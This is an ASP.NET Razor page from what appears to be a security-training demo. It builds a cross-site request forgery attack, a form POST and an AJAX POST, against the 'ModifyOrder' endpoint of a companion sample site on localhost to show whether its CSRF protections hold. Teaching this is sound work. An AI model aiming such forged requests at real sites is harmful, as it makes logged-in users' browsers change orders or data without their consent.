@{
    ViewBag.Title = "CSRF Attacker";
}

<div class="jumbotron">
    <h1>CSRF Attacker</h1>
    <p class="lead">Demonstrates CSRF attack against the "Secure Framework" sample website</p>
	<p>
		This will do a cross-domain form post to the "Modify Order" page on the other sample website 
		in this repo. If you are logged into that site, and the CSRF protections are disabled,
		then the form post will be executed.
	</p>
</div>

<form id="CSRFForm" action="set-by-script" method="post" target="_blank">

	@*This shouldn't work, it won't match the value in the cookie*@
	@Html.AntiForgeryToken()

	<table>
		<tr>
			<td>Site to attack:</td>
			<td>
				<input id="AttackHostInput" type="text" name="attackHost" value="http://localhost:1258/" />
				<i>location of the "Build Secure Systems" site</i>
			</td>
		</tr>
		<tr>
			<td>Which area?</td>
			<td>
				<label><input type="radio" name="area" value="Insecure" checked="checked" /> Insecure</label><br/>
				<label><input type="radio" name="area" value="SecureFeature" /> Secure Feature</label><br />
				<label><input type="radio" name="area" value="SecureFramework" /> Secure Framework</label><br />
			</td>
		</tr>
		@*<tr>
			<td>Order Id:</td>
			<td><input type="text" name="id" value="1" size="5" /></td>
		</tr>
		<tr>
			<td>Amount:</td>
			<td><input type="text" name="amount" value="0" size="5" /></td>
		</tr>
		<tr>
			<td>Card Number:</td>
			<td><input type="text" name="cardNumber" value="0000000000000000" size="20" /></td>
		</tr>*@
		<tr>
			<td></td>
			<td>
				<input type="submit" value="Attack normal POST" />
				<input type="button" value="Attack using AJAX" id="btnAttackAJAX" />
			</td>
		</tr>
	</table>
</form>

<script type="text/javascript">
	$(function () {
		var host = $("#AttackHostInput").val();
		var area = $("input[name='area']:checked").val();

		$("#CSRFForm").on("submit", function () {
			var form = $(this)[0];
			form.action = host + "/" + area + "/ModifyOrder";
		})

		$("#btnAttackAJAX").on("click", function () {
			$.ajax({
				url: host + "/" + area + "/ModifyOrderAjax",
				type: "POST",
			data: {
				"orderId": 1
			},
			dataType: "json",
			success: function(data) {
				alert(JSON.stringify(data));
			},
			error: function(data) {
				alert("Form post failed");
			}
		});

		});
	});
</script>